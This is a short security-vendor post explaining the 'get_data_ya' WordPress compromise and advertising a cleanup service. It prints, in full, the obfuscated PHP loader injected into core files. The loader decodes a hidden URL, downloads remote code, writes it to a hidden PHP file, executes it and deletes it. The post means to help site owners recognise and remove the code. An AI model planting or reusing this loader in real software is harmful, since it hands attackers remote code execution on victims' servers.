As you know there can be various reasons for website to be compromised. If you want to know common reasons why website was compromised?
Make sure you keep your CMS and other third party apps updated.
Incase you need help from an expert we are available contact us! @ 19$ only!
What is get_data_ya hack about?
A core WordPress file, functions.php
inside the wp-includes
folder is modified to include dangerous code which loads/fetches malware from remote servers.
This code can found on other core WordPress files for example wp-config.php and also theme or plugin function files can be found infected as well.
This malware is then saved as .php
file on the infected server and used to perform nefarious activities.
Code dumped into core WordPress files
Following is the code which can be found in various sequences. Always remember to keep website updated and use WordPress maintenance service to grow and keep your site secure.
<?php
@ini_set('display_errors', '0');
error_reporting(0);
if (!$npDcheckClassBgp) {
$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea = str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa = str_replace('sx', '64', $ee); $algo = 'default'; $pass = "Zgc5c4MXrK4ubQYJ7ZtZZv2dPRfXN70cmCWIX7HVoQ==";
if (ini_get('allow_url_fopen')) {
function get_data_ya($url) {
$data = file_get_contents($url);
return $data;
}
}
else {
function get_data_ya($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
}
function wp_cd($fd, $fa="")
{
$fe = "wp_frmfunct";
$len = strlen($fd);
$ff = '';
$n = $len>100 ? 8 : 2;
while( strlen($ff)<$len )
{
$ff .= substr(pack('H*', sha1($fa.$ff.$fe)), 0, $n);
}
return $fd^$ff;
}
$reqw = $ay($ao($oa("$pass"), 'wp_function'));
preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
$dirs = glob("*", GLOB_ONLYDIR);
foreach ($dirs as $dira) {
if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl = fopen("$dira/.$algo", 'w'); break; }
$subdirs = glob("$dira/*", GLOB_ONLYDIR);
foreach ($subdirs as $subdira) {
if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl = fopen("$subdira/.$algo", 'w'); break; }
}
}
if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo", 'w'); }
fwrite($hdl, "<?php\n$mtchs[1]\n?>");
fclose($hdl);
include("{$eb}.$algo");
unlink("{$eb}.$algo");
$npDcheckClassBgp = 'aue';
}
?>
You should immediately remove this code and clean up your website including clearing all vulnerabilities. Expert help is recommended if you aren’t aware what to do.